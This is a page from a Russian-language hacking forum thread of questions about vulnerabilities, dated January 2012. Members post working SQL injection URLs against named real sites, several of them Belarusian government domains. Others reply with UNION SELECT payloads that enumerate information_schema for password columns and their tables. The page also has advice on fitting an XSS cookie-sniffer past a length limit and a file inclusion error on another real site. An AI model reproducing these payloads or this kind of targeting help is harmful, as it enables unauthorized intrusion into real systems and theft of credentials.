HOME FORUMS MEMBERS RECENT POSTS LOG IN  
× Авторизация
Имя пользователя:
Пароль:
Нет аккаунта? Регистрация
Баннер 1   Баннер 2
НОВЫЕ ТОРГОВАЯ НОВОСТИ ЧАТ
loading...
Скрыть
Вернуться   ANTICHAT > БЕЗОПАСНОСТЬ И УЯЗВИМОСТИ > Уязвимости
Перезагрузить страницу Ваши вопросы по уязвимостям.
   
Ответ
Страница 1935 из 2438 « Первая < 9351435183518851925 1931 1932 1933 1934 1935 1936 1937 1938 1939 1945198520352435 > Последняя »
 
Опции темы Поиск в этой теме Опции просмотра

  #19341  
Старый 23.01.2012, 20:07
er9j6@
Постоянный
Регистрация: 17.09.2011
Сообщений: 390
С нами: 7712246

Репутация: 23
По умолчанию
Это MySQL?

_http://www.minprom.gov.by/organizacii?OKPO=24+union+select+1,2,3,4,5,6,7,8,9 ,10,11,12,13,14,15,16,17
 
Ответить с цитированием

  #19342  
Старый 23.01.2012, 22:21
er9j6@
Постоянный
Регистрация: 17.09.2011
Сообщений: 390
С нами: 7712246

Репутация: 23
По умолчанию
Версию вывел, а как сейчас таблицы вывести, подскажите?

_http://www.oim.by/en/department'and(select*from(select(name_const(versi on(),1)),name_const(version(),1))a)and'

Duplicate column name '5.5.8'
 
Ответить с цитированием

  #19343  
Старый 24.01.2012, 01:20
justonline
Постоянный
Регистрация: 27.07.2011
Сообщений: 499
С нами: 7787126

Репутация: 53
По умолчанию
Нашел активку на одном сайте...нет фильтра имени и фамилии. но стоит ограничение по символам. я разбиваю код на две части...пихаю...получается такая штука

перед .ru стоит пробел и естественно снифер не срабатывает. как можно изловчиться и исправить?
 
Ответить с цитированием

  #19344  
Старый 24.01.2012, 01:35
M_script
Новичок
Регистрация: 04.11.2004
Сообщений: 5
С нами: 11322426

Репутация: 0
По умолчанию
justonline, используй сервис сокращения ссылок
 
Ответить с цитированием

  #19345  
Старый 26.01.2012, 00:49
pirat0
Познающий
Регистрация: 16.01.2011
Сообщений: 71
С нами: 8063606

Репутация: -1
По умолчанию
+union+select+1,2,column_name,4,5,6+from+informati on_schema.columns+where+column_name+Like'%pass%'+l imit+0,20+--+

подскажите а как теперь узнать из каких именно таблиц вывелись колонки??

например вывел "password" а название таблицы у этой колонки как узнать
 
Ответить с цитированием

  #19346  
Старый 26.01.2012, 00:56
Konqi
Постоянный
Регистрация: 24.06.2009
Сообщений: 542
С нами: 8885780

Репутация: 672


По умолчанию
Цитата:
Сообщение от pirat0  
+union+select+1,2,column_name,4,5,6+from+informati on_schema.columns+where+column_name+Like'%pass%'+l imit+0,20+--+
подскажите а как теперь узнать из каких именно таблиц вывелись колонки??
например вывел "password" а название таблицы у этой колонки как узнать
union select 1,2,concat(table_name,0x3a,column_name),4,5,6
 
Ответить с цитированием

  #19347  
Старый 26.01.2012, 01:01
pirat0
Познающий
Регистрация: 16.01.2011
Сообщений: 71
С нами: 8063606

Репутация: -1
По умолчанию
спосибо, а то название таблиц не стандартное - "a_affiliates"
 
Ответить с цитированием

  #19348  
Старый 26.01.2012, 01:44
faza02
Banned
Регистрация: 21.11.2007
Сообщений: 181
С нами: 9721141

Репутация: 1013
По умолчанию
Код:
http://www.stroyserver.ru/tender/index.php?id=10294981&background=FFFFFF&parent=rubricator&child=../index
немного не понял ошибку, объясните
 
Ответить с цитированием

  #19349  
Старый 26.01.2012, 08:49
Boolean
Участник форума
Регистрация: 05.09.2010
Сообщений: 147
С нами: 8255126

Репутация: 78
По умолчанию
Цитата:
Сообщение от faza02  
Код:
http://www.stroyserver.ru/tender/index.php?id=10294981&background=FFFFFF&parent=rubricator&child=../index
немного не понял ошибку, объясните
index.php:

PHP код:
[COLOR="#000000"][COLOR="#0000BB"][/COLOR][COLOR="#007700"]include[/COLOR][COLOR="#DD0000"]'include/include.php'[/COLOR][COLOR="#007700"];

include[/COLOR][COLOR="#DD0000"]'some/'[/COLOR][COLOR="#007700"].[/COLOR][COLOR="#0000BB"]$_GET[/COLOR][COLOR="#007700"][[/COLOR][COLOR="#0000BB"]child[/COLOR][COLOR="#007700"]] .[/COLOR][COLOR="#DD0000"]'.php'[/COLOR][COLOR="#007700"];

[/COLOR][/COLOR
include/include.php:

PHP код:
[COLOR="#000000"][COLOR="#0000BB"][/COLOR][COLOR="#007700"][...]

function[/COLOR][COLOR="#0000BB"]strips[/COLOR][COLOR="#007700"](){[/COLOR][COLOR="#FF8000"]/*whatever*/[/COLOR][COLOR="#007700"]}

[...]

[/COLOR][/COLOR
index.php?

функция и так обозначается, и инклудя свой же файл ты вызываешь обозначение той же самой функции, но т.к. она уже обозначена ты получаешь ошибку.
 
Ответить с цитированием

  #19350  
Старый 26.01.2012, 11:07
Unknown
Новичок
Регистрация: 21.06.2005
Сообщений: 0
С нами: 10992741

Репутация: 0
По умолчанию
Цитата:
Сообщение от pirat0  
+union+select+1,2,column_name,4,5,6+from+informati on_schema.columns+where+column_name+Like'%pass%'+l imit+0,20+--+
подскажите а как теперь узнать из каких именно таблиц вывелись колонки??
например вывел "password" а название таблицы у этой колонки как узнать
Сразу выводи название таблиц и колонок, чтобы их потом отдельно не смотреть.

Цитата:
Сообщение от None  
union select 1,2,concat_ws(0x3a,table_name,column_name),4,5,6 from information_schema.columns where column_name like '%pass%' limit 0,20-- f
UPD: Konqi уже ответил не заметил
 
Ответить с цитированием
Ответ
Страница 1935 из 2438 « Первая < 9351435183518851925 1931 1932 1933 1934 1935 1936 1937 1938 1939 1945198520352435 > Последняя »



Предыдущая тема Следующая тема
Похожие темы
Тема Автор Раздел Ответов Последнее сообщение
Ваши ламерские приколы (Ну когда только комп появился) PEPSICOLA Болталка 188 23.05.2010 10:05
Ваши любимые компьютерные игры PEPSICOLA Болталка 280 19.08.2009 00:01
Ваши телеги... F-IFTY Болталка 13 18.08.2009 18:22
Вопросы по Ipb 2.0 Voodoo_People Уязвимости CMS / форумов 26 15.02.2005 22:57



Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
 


Быстрый переход




ANTICHAT ™ © 2001- Antichat Kft.